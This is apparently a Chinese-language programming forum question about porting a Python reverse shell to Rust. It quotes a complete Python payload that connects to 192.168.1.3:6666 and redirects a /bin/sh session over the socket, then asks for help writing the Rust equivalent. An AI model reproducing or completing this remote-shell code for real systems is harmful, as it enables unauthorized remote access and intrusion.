如果具有IP地址的计算机正在侦听给定端口,则可以使用Python创建一个反向shell,并使用以下代码示例:
userList
我正在尝试使用Rust复制此过程:
import socket, subprocess, os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((\"192.168.1.3\", 6666));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call([\"/bin/sh\", \"-i\"]);
我只能获得与主机的TCP连接(使用netcat监听:let mut stream = std::net::TcpStream::connect("192.168.1.3:6666").expect("Couldn't connect to the server...");
)。如果我理解正确,我需要通过套接字重定向标准输入,输出和错误,然后以某种方式“调用”nc -l -p 6666
(我应该使用/bin/sh
吗?)。我对网络相对较新,我不了解很多概念。
有人可以帮我在Rust中创建这个反向shell脚本吗?